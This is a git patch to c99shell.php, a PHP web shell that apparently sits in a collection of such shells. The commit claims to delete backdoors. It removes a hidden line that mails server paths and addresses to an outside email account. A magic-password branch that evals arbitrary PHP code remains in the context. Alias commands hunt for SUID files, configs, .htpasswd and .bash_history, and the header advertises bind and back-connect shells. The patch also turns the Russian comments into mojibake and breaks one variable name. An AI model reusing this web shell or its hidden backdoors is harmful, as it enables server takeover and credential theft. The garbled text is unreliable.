From 104adac40fa40b162581393207f4d7baf97b655b Mon Sep 17 00:00:00 2001 From: tennc Date: Fri, 7 Oct 2016 16:03:24 +0800 Subject: [PATCH] Update c99shell.php del backdoors https://github.com/tennc/webshell/issues/18 thinks to @Varbaek --- php/PHPshell/c99shell/c99shell.php | 102 ++++++++++++++--------------- 1 file changed, 51 insertions(+), 51 deletions(-) diff --git a/php/PHPshell/c99shell/c99shell.php b/php/PHPshell/c99shell/c99shell.php index 3001c1e..7499413 100644 --- a/php/PHPshell/c99shell/c99shell.php +++ b/php/PHPshell/c99shell/c99shell.php @@ -2,35 +2,35 @@ /* ****************************************************************************************************** * -* c99shell.php v.1.0 ( 5.02.2005) +* c99shell.php v.1.0 (îò 5.02.2005) * Freeware WEB-Shell. -* CCTeaM. -* c99shell.php - www-. -* : http://ccteam.ru/releases/c99shell +* © CCTeaM. +* c99shell.php - øåëë ÷åðåç www-áðîóçåð. +* Âû ìîæåòå ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà: http://ccteam.ru/releases/c99shell * * WEB: http://ccteam.ru * UIN: 656555 * -* : -* ~ /, ( tar) -* modify-time access-time - (./. $filestealth) -* ~ / ( ) -* ~ unix-, , - "" . -* ~ ( ) - ( , / ) -* ~ PHP- -* ~ - -* ~ ftp- login;login - /etc/passwd ( 1/100 ) -* ~ SQL -* ~ "" include, , $surl. -* ~ /bin/bash , - back connect ( , - NetCat). +* Âîçìîæíîñòè: +* ~ óïðàâëåíèå ôàéëàìè/ïàïêàìè, çàêà÷èâàíèå è ñêà÷èâàíèå ôàéëîâ è ïàïêîê (ïðåäâîðèòåëüíî ñæèìàåòñÿ â tar) +* modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè + ðåäàêòèðîâàíèè ôàéëîâ (âûêë./âêë. ïàðàìåòðîì $filestealth) +* ~ ïðîäâèíóòûé ïîèñê ïî ôàéëàì/ïàïêàì (èùåò òàêæå âíóòðè ôàéëîâ) +* ~ óïðàâëåíèå ïðîöåññàìè unix-ìàøèíû, âîçìîæíîñòü îòïðàâêè ñèãíàëà çàâåðøåíèÿ, + à òàêæå áàíàëüíîå "ïðèáèâàíèå" ïðîöåññà. +* ~ óäîáíîå (èíîãäà ãðàôè÷åñêîå) âûïîëíåíèå øåëë-êîìàíä (ìíîãî àëèàñîâ, ìîæíî ëåãêî äîáàâëÿòü/óäàëÿòü èõ) +* ~ âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà +* ~ âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà +* ~ áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç + /etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ) +* ~ ïðîäâèíóòûé ìåíåäæåð SQL +* ~ ñêðèïò "ëþáèò" include, äëÿ íîðìàëüíîé ðàáîòû, Âàì íóæíî ñìåíèòü $surl. +* ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì, + èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ, + è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat). * * -* 5.02.2005 Captain Crunch Security TeaM +* 5.02.2005 © Captain Crunch Security TeaM * * Coded by tristram ****************************************************************************************************** @@ -99,25 +99,25 @@ $bindport_port = "11457"; // default port for binding /* Command-aliases system */ $aliases = array(); $aliases[] = array("-----------------------------------------------------------", "ls -la"); -/* suid */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls"); -/* suid */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls"); -/* sgid */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls"); -/* sgid */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls"); -/* config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php"); -/* config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\""); -/* config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\""); -/* */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls"); -/* */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls"); -/* service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd"); -/* service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd"); -/* .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd"); -/* .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"); -/* .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history"); -/* .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history"); -/* .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"); -/* .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"); -/* ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va"); -/* */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen"); +/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls"); +/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls"); +/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls"); +/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls"); +/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php"); +/* ïîèñê íà ñåðâåðå ôàéëîâ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\""); +/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\""); +/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls"); +/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls"); +/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd"); +/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd"); +/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd"); +/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"); +/* ïîèñê âñåõ ôàéëîâ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history"); +/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history"); +/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"); +/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"); +/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va"); +/* ïðîñìîòð îòêðûòûõ ïîðòîâ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen"); $sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie" $sess_cookie = "c99shvars"; // cookie-variable name @@ -195,7 +195,7 @@ if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass)) header("WWW-Authenticate: Basic realm=\"c99shell\""); header("HTTP/1.0 401 Unauthorized"); if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);} exit; -}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF']; $lastdir = realpath("."); chdir($curdir); @@ -742,7 +742,7 @@ if ($act == "sql") { echo "---[ ".htmlspecialchars($sql_db)." ]---
"; $c = 0; - while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo " ".htmlspecialchars($row[0])." (".$count_row[0].")
 + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
 "; mysql_free_result($count); $c++;} if (!$c) {echo "No tables found in database.";} } @@ -853,7 +853,7 @@ if ($act == "sql") $i++; } echo ""; - echo "
"; + echo "
»
"; echo "
".$i." table(s)
"; echo "".$trows.""; echo "".$row[1].""; @@ -2848,7 +2848,7 @@ $imgequals = array( } if ($act == "about") { - $dta = "Any stupid copyrights and copylefts"; + $dàta = "Any stupid copyrights and copylefts"; echo $data; } @@ -2871,24 +2871,24 @@ $microtime = round(getmicrotime()-$starttime,4); - mySQL !

+ Ââåäèòå äàííûå äëÿ ïîäêëþ÷åíèþ ê mySQL ñåðâåðó!

- : + Àäðåñ ñåðâåðà: - : + Íàçâàíèå áàçû: - : + Ëîãèí: - + Ïàðîëü


-


+